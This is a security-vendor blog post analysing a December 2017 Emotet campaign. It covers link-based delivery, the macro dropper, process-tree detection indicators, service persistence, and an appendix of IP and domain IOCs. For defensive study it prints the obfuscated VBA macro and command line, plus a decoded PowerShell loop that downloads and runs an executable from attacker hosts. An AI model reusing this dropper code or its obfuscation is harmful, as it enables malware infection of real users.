Hunting for Emotet

Posted on 22 December 2017 by Alex Davies and Connor Morley

Throughout December Countercept saw a wave of Emotet infections related to a new email campaign spreading malicious documents using links. In this post we will dissect the latest Emotet dropper and payload, highlighting the TTPs and IOCs that can be used to detect and prevent such attacks.

Initial Delivery

During December Countercept saw a new wave of emails being sent that contained links pointing to third party sites. When visited the site would prompt users to download a Word document containing a macro payload.

 

A mix of sites were seen distributing payloads, some registered by the attackers, others were previously compromised sites. One interesting example seen by Countercept was the use of teamwork.com to distribute the initial document payload. Teamwork allows organisations to create their own subdomains and host content, which although useful for organisations also provides a way for attackers to distribute payloads.

 

In this campaign the attacker was seen to use the subdomain “enterpriseupdates” and the folder “Sales-Invoice” to appear legitimate. The full address used was:

hxxps://enterpriseupdates.teamwork.com/Sales-Invoice/ 

 

The full list of hosted domains have been included in the appendix (1).

Document Payload

The initial document payload used social engineering to trick the user into enabling the content and allowing macro execution.

1 emotet social engineering macro

The macro payload made extensive use of character encoding and replacement to bypass detection and reversing. A snippet is shown below:

Attribute VB_Name = “OnWUPzGiPz”
Sub AutoOpen()
On Error Resume Next
VOCnXsrcL = 9 * Tan(2487 / 9591 – 7 + Chr(57 – Sin(7))) + 8 + ChrB(14 + Atn(8 / ChrW(5) + 4320 + Log(97)) – 9 / 12) – (13 – Cbool(881 – 9) * TmfXJir + Cos(10))
djPoCzMlo = 14 * Tan(2487 / 9591 – 7 + Chr(57 – Sin(13))) + 13 + ChrB(13 + Atn(14 / ChrW(5) + 4320 + Log(97)) – 12 / 14) – (14 – Cbool(881 – 11) * TmfXJir + Cos(7))

Through dynamic analysis it was straightforward to extract the executed commands of the payload and retrieve the deobfuscated text. The macro was found to first spawn a cmd which then spawned a powershell process. The anomalous parent/child processes were one of the key indicators detected by Countercept.

  • Initial macro execution - winword.exe -> cmd.exe
  • Powershell launching from cmd - cmd.exe -> powershell.exe

The raw command arguments are shown below. The heavy use of obfuscation is in itself an anomalous indicator and ironically highlighted the activity. 

cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k

Obfuscation was also applied to the Powershell commands executed. Powershell-enhanced-logging could have easily revealed the underlying commands in this example:

powershell "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd =k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect
…
rEPlaCe 'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

A decoded and simplified section of the Powershell is shown below. This Powershell dropper code has been used extensively in previous campaigns.

rONfranc = new-object System.Net.WebClient;
rONbcd = H1Ihxxp://coffeybarn.com/Qq3sDS0/,hxxp://easyfood.us/G4VaoW/,hxxps://icbb.unud.ac.id/0XSX0/,hxxp://festival-druzba.com.ua/r4Iwz/,hxxp://plan.goteborg2021.webadmin8.net/wp-content/themes/goteborg/fhYm/H1I.Split(H1I,H1I);
rONnsadasd = new-object random;
rONkarapas = rONnsadasd.next(1, 343245);
rONhuas = env:public + "\" + rONkarapas + ".exe";
foreach(rONabc in rONbcd){
try{
rONfranc.DownloadFile(rONabc.ToString(), rONhuas);
Invoke-Item(rONhuas);
break;}catch{write-host rON_.Exception.Message;}}|&(IEX)

The deobfuscated Powershell shows that a simple loop is used to iterate over multiple domains to download and execute a second stage payload. This name of this file is dynamically generated using the System.Random.Next() function, to create names such as “177551.exe”.

 

The use of suspicious Powershell commands as well as the outbound network connections and file creation from Powershell were key indicators that helped Countercept spot the malicious activity.

Second stage

As discussed in previous research Emotet’s core code will collect information about the infected system such as OS, hardware and running services and relay that information back to a C&C server. On contact the malware checks if there is an updated version of itself to download, it then checks for what payloads it is scheduled to download and continues to download and execute all payloads configured on the C&C server.

 

The second stage payloads seen by Countercept would drop an additional file, the location used would depend on the permissions of the user. With an administrator account “C:\Windows\SysWOW64” was used, otherwise “%USERPROFILE%\AppData\Local\Microsoft\Windows” was used. The variants seen used the names “nvidiaflt.exe” and “cachetask.exe”.

 

With administrative rights this payload was also seen installing a service to gain persistence and elevate access to execute as SYSTEM, for example:

Name: nvidiaflt
Display Name: nvidiaflt
Path: %WINDIR%\SysWOW64\nvidiaflt.exe

This binary also created another service “cryptsec” that would load “C:\Windows\SysWOW64\cryptsec.exe” and execute additional payloads. The parent/child processes (along with PIDs) are shown below:

2 emotet binary creation payload

Although analysis of these files is beyond the scope of this post, attackers can use this foothold to install a wide variety of payloads for different functions including worm modules for further network infection, password theft modules or secondary Trojans such as the banking Trojan Dridex.

Lessons learned

From a defensive perspective there are a number of key takeaways:

  • Macro based attacks continue to be the preferred method of payload delivery
  • Endpoint visibility allowed every stage of the compromise to be fully investigated
  • Attackers will continue to use legitimate services such as Teamwork to spread malware
  • Users need to remain vigilant and should not trust links delivered by email even if legitimate sites are used

As always, disabling of macros, application whitelisting and implementation of ASR rules would have prevented the majority of the kill chain described in this post.

 

For many organisations who can’t implement such controls, by focusing on detection instead it is possible to discover and contain malicious activity ensuring you remain secure. Having a security team that is able to identify, investigate and contain active attacks is key to preventing further and future infections.

 

References

https://wxw.hybrid-analysis.com/sample/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b5?environmentId=100
https://securingtomorrow.mcafee.com/mcafee-labs/emotet-trojan-acts-as-loader-spreads-automatically/
http://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/

 

Appendix - Indicators of compromise:
 IP Addresses:
  •  46.4.192.185
  • 107.170.177.153
  • 168.235.85.153
  • 192.155.88.196
  • 87.106.94.90
  • 87.106.94.90
  • 85.214.224.206
  • 178.254.1.183
  • 168.235.74.192
  • 81.169.180.84
  • 153.149.153.41
  • 194.88.246.242
  • 220.227.247.45
  • 87.106.247.42
  • 45.33.87.54
  • 62.210.253.72
  • 5.230.193.41
Domains:
  • hxxp://coffeybarn.com/qq3sds0/,
  • hxxp://easyfood.us/g4vaow/,
  • hxxps://icbb.unud.ac.id/0xsx0/,
  • hxxp://festival-druzba.com.ua/r4iwz/,
  • hxxp://plan.goteborg2021.webadmin8.net/wp-content/themes/goteborg/fhym/
  • hxxp://wxw.cableweb.org/Overdue-payment/
  • hxxp://logoswift.net/Invoice/
  • hxxp://wxw.exxecutive.com/Invoice-Number-35464/
  • hxxps://enterpriseupdates.teamwork.com/Sales-Invoice/
  • hxxp://wxw.chooseordie.me/Outstanding-Invoices/
  • wxw.finditinfondren.net/INCORRECT-INVOICE/
  • wxw.nagelpilzbehandeln.info/Outstanding-Invoices
  • hxxp://wxw.nagelpilzbehandeln.info/Outstanding-Invoices/
  • wxw.imagemirror.ru/Invoice-Number-19700/
  • hxxp://wxw.klesarstvo-antolasic.com/Invoices-Overdue/
  • hxxp://wxw.farggrossisten.se/Sales-Invoice/
  • wxw.hollywoodproducts.us/Invoices-Overdue
  • hxxp://wxw.danmerkelmedia.com/Final-Account/
  • hxxp://oceangroup.pl/Outstanding-INVOICE-NZXZ/5166934/2962/
  • wxw.cableweb.org/Overdue-payment/
  • hxxp://wxw.insuredmeds.com/Invoice/
  • hxxp://wxw.finditinfondren.net/INCORRECT-INVOICE/
  • hxxps://wxw.focussup.com/Outstanding-INVOICE-ECLPR/9243051/742/
  • hxxp://wxw.jarealestateguide.com/Overdue-payment/
  • hxxp://wxw.brewer.designgrotto.com/Invoice/
  • hxxp://wxw.midsouthsigns.com/Invoice-81197936
  • patriot-rus.ru/manager/Sales-Invoice/
  • wxw.focussup.com/Outstanding-INVOICE-ECLPR/9243051/742/
  • hxxp://aes-systems.org/KKW5-2637202022/
  • hxxp://wxw.cmnoutdoor.com/Invoices-attached/
  • hxxp://wxw.jaimelamaro.com/Invoices-attached/
  • hxxp://wxw.finditinfondren.net/INCORRECT-INVOICE
  • hxxp://wxw.app.feed.builders/Outstanding-INVOICE-HPQZY/868707/918/